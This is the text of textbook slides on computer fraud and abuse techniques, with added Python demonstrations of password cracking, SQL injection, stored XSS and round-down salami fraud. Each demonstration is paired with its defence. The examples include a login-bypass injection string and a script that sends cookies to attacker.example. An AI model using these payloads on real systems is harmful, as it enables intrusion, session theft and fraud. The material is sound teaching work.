Fifteenth Edition
Chapter 9
Computer Fraud and Abuse Techniques
Copyright © 2021, 2018, 2015 Pearson Education, Inc. All Rights Reserved
Learning Objectives
• Compare and contrast computer attack and abuse tactics.
Computer Attacks and Abuse
• There are six steps that many criminals use to attack
information systems:
– Conduct reconnaissance
– Attempt social engineering
– Scan and map the target
– Research (look for known vulnerabilities in the systems found during scanning)
– Execute the attack
– Cover tracks
Types of Attacks
• Hacking
– Unauthorized access, modification, or use of an
electronic device or some element of a computer
system
• Social Engineering
– Techniques or tricks on people to gain physical or
logical access to confidential information
• Malware
– Software used to do harm
Hacking
• Hijacking
  – Gaining control of a computer to carry out illicit activities
• Botnet (robot network)
  – Zombies
  – Bot herders
• Denial of Service (DoS) attack
• Brute force attack
• Password cracking
• Dictionary attack
• Spamming
• Spoofing
  – Makes the communication look as if someone else sent it so as to gain
    confidential information
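The password-cracking items above (brute force, dictionary attack) come down to guessing candidates and hashing them until one matches a stolen hash. The following added example, which is not part of the original slides, shows both attacks against an unsalted SHA-256 hash and then the storage scheme that makes the same guessing run expensive: a per-user random salt with an iterated PBKDF2 derivation. The wordlist, the victim password and the PIN are constructed sample inputs; `PBKDF2_ITERATIONS` is an assumed tuning value.

```python
import hashlib
import hmac
import itertools
import os
from typing import Iterable, Optional, Tuple

# Constructed sample inputs (not from the original slides): a tiny wordlist and
# a victim password that happens to be in it. Real wordlists hold millions of
# entries taken from earlier breaches.
WORDLIST = ["123456", "password", "letmein", "qwerty", "Summer2021", "welcome1"]
PBKDF2_ITERATIONS = 100_000  # assumed work factor; tune upward as hardware gets faster


def weak_hash(password: str) -> str:
    """Unsalted single SHA-256: fast, and identical for every user who picked the
    same password, which is exactly what makes dictionary attacks cheap."""
    return hashlib.sha256(password.encode()).hexdigest()


def dictionary_attack(target_hash: str, wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Hash each candidate word and compare it with the stolen hash.
    Returns (recovered password or None, number of hashes computed)."""
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        if weak_hash(candidate) == target_hash:
            return candidate, attempts
    return None, attempts


def brute_force_pin(target_hash: str, length: int = 4) -> Tuple[Optional[str], int]:
    """Exhaustive search over every numeric PIN of the given length (10**length guesses)."""
    attempts = 0
    for digits in itertools.product("0123456789", repeat=length):
        attempts += 1
        candidate = "".join(digits)
        if weak_hash(candidate) == target_hash:
            return candidate, attempts
    return None, attempts


def strong_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = PBKDF2_ITERATIONS) -> Tuple[bytes, bytes]:
    """Salted, iterated PBKDF2-HMAC-SHA256. A random per-user salt makes a
    precomputed table useless (the same password yields different digests), and
    the iteration count multiplies the cost of every guess the attacker makes."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_strong(password: str, salt: bytes, digest: bytes,
                  iterations: int = PBKDF2_ITERATIONS) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = strong_hash(password, salt, iterations)
    return hmac.compare_digest(candidate, digest)


def guess_cost(attempts: int, iterations: int = PBKDF2_ITERATIONS) -> int:
    """SHA-256 computations the same guessing run would cost against PBKDF2
    storage: each guess costs `iterations` hashes instead of one."""
    return attempts * iterations


if __name__ == "__main__":
    stolen = weak_hash("Summer2021")
    print(dictionary_attack(stolen, WORDLIST))        # ('Summer2021', 5)
    print(brute_force_pin(weak_hash("0427")))         # ('0427', 428)
    salt, digest = strong_hash("Summer2021")
    print(verify_strong("Summer2021", salt, digest))  # True
    print(guess_cost(428))                            # 42800000
```

The attacks succeed here because the stored hash is unsalted and fast; they are not defeated by a "strong" hash function alone. With `strong_hash` the attacker must redo the full PBKDF2 computation per user and per guess, so a 428-guess PIN search costs 42.8 million SHA-256 operations instead of 428.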
Forms of Spoofing
• E-mail spoofing
• Caller ID spoofing
• IP address spoofing
• SMS spoofing
• Web-page spoofing (phishing)
Hacking with Computer Code
• Cross-site scripting (XSS)
  – Exploits a flaw in a Web application that lets an attacker inject
    script into a page the site serves to other users. When a user's
    browser loads that page, the injected script runs with the site's
    privileges and can read the user's data, such as session cookies.
• Buffer overflow attack
  – More data is sent than the program's input buffer can hold; the excess
    overwrites adjacent memory (for example, a function's return address),
    so instead of merely crashing, the program executes the attacker's
    instructions.
• SQL injection (insertion) attack
  – Attacker-supplied input is placed into a database query without proper
    handling, so the input is interpreted as part of the query itself and
    can read, change, or bypass access controls on database information
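Both XSS and SQL injection are the same mistake in two settings: untrusted text is concatenated into a language (SQL, HTML) that an interpreter then parses. The following added example, not part of the original slides, shows a login query built by string concatenation being bypassed by a single crafted username, then the parameterized form that is immune to it; and a comment rendered raw into HTML beside the escaped rendering. The in-memory database, the user record, and the attack inputs are constructed for the demonstration.

```python
import html
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample database (not from the slides). The password
    is stored in clear text only to keep the injection demonstration short;
    real systems store salted, iterated hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!', 'admin')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[Tuple[str, str]]:
    """Builds the SQL by string concatenation, so the user's text is parsed as
    part of the query. A quote in the input ends the string literal and the
    rest of the input becomes SQL."""
    query = ("SELECT username, role FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[Tuple[str, str]]:
    """Parameterized query: the SQL text is fixed and the values travel
    separately, so nothing the user types can change the query's structure."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def render_comment_vulnerable(comment: str) -> str:
    """Inserts user text straight into HTML: a <script> tag in the comment is
    stored once and then executed by every visitor's browser (stored XSS)."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    """Escapes <, >, &, and quotes so the browser displays the text instead of
    parsing it as markup."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


# Constructed attack inputs.
# Closes the string literal, makes the WHERE clause always true, and comments
# out the password check, so the first user in the table is returned.
SQLI_USERNAME = "' OR 1=1 --"
# Sends the visitor's cookies to an attacker-controlled host (attacker.example
# is a reserved, non-resolving domain).
XSS_COMMENT = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, SQLI_USERNAME, "wrong"))   # ('alice', 'admin')
    print(login_safe(db, SQLI_USERNAME, "wrong"))         # None
    print(render_comment_vulnerable(XSS_COMMENT))
    print(render_comment_safe(XSS_COMMENT))
```

In `login_vulnerable` the resulting SQL is `... WHERE username = '' OR 1=1 --' AND password = 'wrong'`, which returns alice's admin row without any password. In `login_safe` the same input is compared as a literal username and matches nothing. The HTML case is the same lesson: `html.escape` turns `<script>` into `&lt;script&gt;`, which the browser renders as text.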
Other Types of Hacking
• Man in the middle (MITM)
– Hacker is placed in between a client (user) and a host
(server) to read, modify, or steal data.
• Masquerading/impersonation
• Piggybacking
• War dialing and driving
• Phreaking
• Podslurping
Hacking Used for Embezzlement
• Salami technique
  – Taking small amounts at a time, so that no single theft is noticed
  – Round-down fraud: the fractions of a cent lost when interest calculations
    are rounded down are credited to the perpetrator's account
• Economic espionage
– Theft of information, intellectual property, and trade
secrets
• Cyber-extortion
– Threats to a person or business online through e-mail
or text messages unless money is paid
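Round-down fraud works because a control that only compares total interest posted with total interest due cannot tell rounding noise from theft. The following added example, not part of the original slides, simulates the fraud over a constructed four-account ledger and then runs two controls against the postings: the totals reconciliation that the fraud passes, and a per-account recomputation that flags every shaved account and the perpetrator's account. The balances, the monthly rate and the account names are all constructed.

```python
from decimal import Decimal, ROUND_DOWN, ROUND_HALF_UP
from typing import Dict, Tuple

CENT = Decimal("0.01")
MONTHLY_RATE = Decimal("0.005")   # constructed: 0.5% per month

# Constructed sample ledger (not from the slides): account -> balance.
ACCOUNTS: Dict[str, Decimal] = {
    "A-1001": Decimal("1333.00"),   # exact interest 6.66500: rounds to 6.67, truncates to 6.66
    "A-1002": Decimal("2100.00"),   # exact interest 10.50000: nothing to skim
    "A-1003": Decimal("999.99"),    # exact interest 4.99995: rounds to 5.00, truncates to 4.99
    "A-1004": Decimal("4567.89"),   # exact interest 22.83945: rounds to 22.84, truncates to 22.83
}
THIEF_ACCOUNT = "X-9999"  # hypothetical account the perpetrator controls


def honest_interest(balance: Decimal) -> Decimal:
    """What the system is supposed to post: interest rounded to the nearest cent."""
    return (balance * MONTHLY_RATE).quantize(CENT, rounding=ROUND_HALF_UP)


def salami_interest(balances: Dict[str, Decimal]) -> Dict[str, Decimal]:
    """Round-down fraud: truncate every account's interest to the cent and
    credit the shaved fractions to the perpetrator's account. Each victim is
    short by at most a cent, and the grand total still reconciles."""
    postings: Dict[str, Decimal] = {}
    skimmed = Decimal("0")
    for acct, balance in balances.items():
        exact = balance * MONTHLY_RATE
        paid = exact.quantize(CENT, rounding=ROUND_DOWN)
        postings[acct] = paid
        skimmed += exact - paid
    postings[THIEF_ACCOUNT] = skimmed.quantize(CENT, rounding=ROUND_DOWN)
    return postings


def totals_reconcile(balances: Dict[str, Decimal], postings: Dict[str, Decimal],
                     tolerance: Decimal = CENT) -> bool:
    """The weak control: compare total interest posted with total interest due.
    Rounding noise is within tolerance, so this passes for honest and salami runs."""
    due = sum(bal * MONTHLY_RATE for bal in balances.values())
    posted = sum(postings.values())
    return abs(posted - due) <= tolerance


def find_round_down_anomalies(balances: Dict[str, Decimal],
                              postings: Dict[str, Decimal]) -> Dict[str, Tuple[Decimal, Decimal]]:
    """The effective control: recompute each account's interest independently and
    report (expected, posted) for every mismatch, including credits to an account
    that has no balance to earn interest on."""
    flagged: Dict[str, Tuple[Decimal, Decimal]] = {}
    for acct, posted in postings.items():
        expected = honest_interest(balances[acct]) if acct in balances else Decimal("0.00")
        if posted != expected:
            flagged[acct] = (expected, posted)
    return flagged


if __name__ == "__main__":
    honest = {acct: honest_interest(bal) for acct, bal in ACCOUNTS.items()}
    fraud = salami_interest(ACCOUNTS)
    print(totals_reconcile(ACCOUNTS, honest), totals_reconcile(ACCOUNTS, fraud))  # True True
    print(find_round_down_anomalies(ACCOUNTS, honest))  # {}
    print(find_round_down_anomalies(ACCOUNTS, fraud))   # four flagged accounts, X-9999 among them
```

Over four accounts the thief nets two cents, which is the point: scaled to millions of accounts and every interest run, the take is material while each individual victim's statement is off by less than a cent. Detection therefore has to recompute per account (or at least sample accounts and recompute), and should treat any interest credit to an account with no interest-bearing balance as an exception.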
Hacking Used for Fraud
• Internet misinformation
• E-mail threats
• Internet auction
• Internet pump and dump
• Cryptocurrency fraud
• Click fraud
• Software piracy
Social Engineering Techniques
• Identity theft
  – Assuming someone else's identity
• Pretexting
  – Using an invented scenario to trick victims into divulging information
    or granting access
• Posing
  – Creating a fake business to get sensitive information
• Phishing
  – Sending an e-mail asking the victim to follow a link that appears
    legitimate but leads to a page requesting sensitive data
• Pharming
  – Redirects traffic intended for a legitimate website to a spoofed website
• URL hijacking
  – Takes advantage of typographical errors in website addresses; the user
    lands on an invalid or wrong website
• Scavenging
  – Searching trash for confidential information
• Shoulder surfing
  – Snooping (either from close behind the person or using technology) to
    obtain confidential information
• Skimming
  – Double swiping a credit card to capture its data
• Eavesdropping
Why People Fall Victim
• Compassion
– Desire to help others
• Greed
– Want a good deal or something for free
• Sex appeal
– More cooperative with those that are flirtatious or good looking
• Sloth
– Lazy habits
• Trust
– Will cooperate if trust is gained
• Urgency
– Cooperation occurs when there is a sense of immediate need
• Vanity
– More cooperation when appeal to vanity
Minimize the Threat of Social
Engineering
• Never let people follow you into restricted areas
• Never log in for someone else on a computer
• Never give sensitive information over the phone or through
e-mail
• Never share passwords or user IDs
• Be cautious of someone you don’t know who is trying to
gain access through you
Types of Malware
• Spyware
  – Secretly monitors and collects information
  – Can hijack the browser and search requests
  – Adware, scareware
• Cyber-extortion
  – Threatening to harm a company or a person if a specified amount of
    money is not paid
• Keylogger
  – Software that records user keystrokes
• Trojan Horse
  – Malicious computer instructions in an authorized and properly
    functioning program
• Trap door
  – Set of instructions that allow the user to bypass normal system
    controls
• Packet sniffer
  – Captures data as it travels over the Internet
• Virus
  – A section of self-replicating code that attaches to a program or file
    and requires a human to do something so it can replicate itself
• Worm
  – Stand-alone self-replicating program
Cellphone Bluetooth Vulnerabilities
• Bluesnarfing
– Stealing contact lists, data, pictures on Bluetooth
compatible smartphones
• Bluebugging
– Taking control of a phone to make or listen to calls,
send or read text messages
Key Terms (1 of 3)
• Hacking
• Hijacking
• Botnet
• Zombies
• Bot herder
• Denial-of-service (DoS) attack
• Brute force attack
• Password cracking
• Dictionary attack
• Spamming
• Spoofing
• E-mail spoofing
• Caller ID spoofing
• IP address spoofing
• SMS spoofing
• Web-page spoofing
• Vulnerabilities
• Zero-day attack
• Patch
• Cross-site scripting (XSS)
• Buffer overflow attack
• SQL injection (insertion) attack
• Man-in-the-middle (MITM) attack
• Masquerading/impersonation
• Piggybacking
• War dialing
• War driving
• Phreaking
• Podslurping
Key Terms (2 of 3)
• Salami technique
• Round-down fraud
• Economic espionage
• Cyber-bullying
• Sexting
• Internet misinformation
• E-mail threats
• Internet auction fraud
• Internet pump-and-dump fraud
• Cryptocurrency fraud
• Click fraud
• Software piracy
• Social engineering
• Identity theft
• Pretexting
• Posing
• Phishing
• Vishing
• Carding
• Pharming
• Evil twin
• Typosquatting/URL hijacking
• Scavenging/dumpster diving
• Shoulder surfing
• Lebanese looping
• Skimming
• Chipping
• Eavesdropping
Key Terms (3 of 3)
• Spyware
• Adware
• Torpedo software
• Scareware
• Cyber-extortion
• Ransomware
• Keylogger
• Trojan horse
• Time bomb/logic bomb
• Trap door/back door
• Packet sniffers
• Steganography program
• Rootkit
• Virus
• Worm
• Bluesnarfing
• Bluebugging